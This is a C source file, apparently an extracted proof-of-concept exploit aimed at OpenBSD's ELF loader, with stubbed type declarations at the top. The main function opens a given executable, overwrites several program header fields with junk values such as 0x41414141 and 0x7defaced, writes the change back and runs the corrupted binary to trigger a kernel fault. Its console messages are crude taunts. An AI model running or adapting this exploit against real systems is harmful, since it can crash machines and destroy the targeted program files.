
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_4__ TYPE_2__ ;
typedef struct TYPE_3__ TYPE_1__ ;


struct stat {int st_size; } ;
struct TYPE_4__ {int e_phoff; } ;
struct TYPE_3__ {int p_type; int p_filesz; int p_vaddr; } ;
typedef TYPE_1__ Elf32_Phdr ;
typedef TYPE_2__ Elf32_Ehdr ;


 int MAP_SHARED ;
 int MS_ASYNC ;
 int O_RDWR ;
 int PROT_READ ;
 int PROT_WRITE ;
 int arc4random () ;
 char* big_b00bz ;
 int close (int) ;
 int fstat (int,struct stat*) ;
 scalar_t__ mmap (int *,int ,int,int ,int,int ) ;
 int msync (char*,int ,int ) ;
 int munmap (char*,int ) ;
 int open (char*,int ) ;
 int printf (char*,char*) ;
 int puts (char*) ;
 int sleep (int) ;
 int system (char*) ;

int main(int argc, char **argv)
{
 Elf32_Ehdr *hdr;
 Elf32_Phdr *pht;
 struct stat statinfo;
 char *elfptr;
 int fd;

 if(argc != 2) return printf("Usage: %s <elf_exec>\n", argv[0]);
 fd = open(argv[1], O_RDWR);
 fstat(fd, &statinfo);
 elfptr = (char *) mmap(((void*)0), statinfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
 hdr = (Elf32_Ehdr *) (elfptr);
 pht = (Elf32_Phdr *) (elfptr + hdr->e_phoff);
 printf("%s", big_b00bz);
 pht[9].p_type = 0x7defaced;
 pht[2].p_filesz = (arc4random() % 2) ? 0x41414141 : 0x43434343;
 sleep(3 + (arc4random() % 3));
 if(arc4random() % 3 == 2) puts(" .. I like b1g 0nez !!");
 else { if(arc4random() % 2){ puts(" .. want s0me ?!"); pht[5].p_vaddr = 0xb16b00b5; }
 else { puts(" .. j00 like it ?!"); pht[5].p_vaddr = 0x0ace55e8; }}
 msync(elfptr, 0, MS_ASYNC);
 munmap(elfptr, statinfo.st_size);
 close(fd);
 sleep(3 + (arc4random() % 3));
 system(argv[1]);
 puts("... s0rry, this piece of sh1t didn't w0rk in j00r obsd\n");
 return 0xDEFECA7E;
}
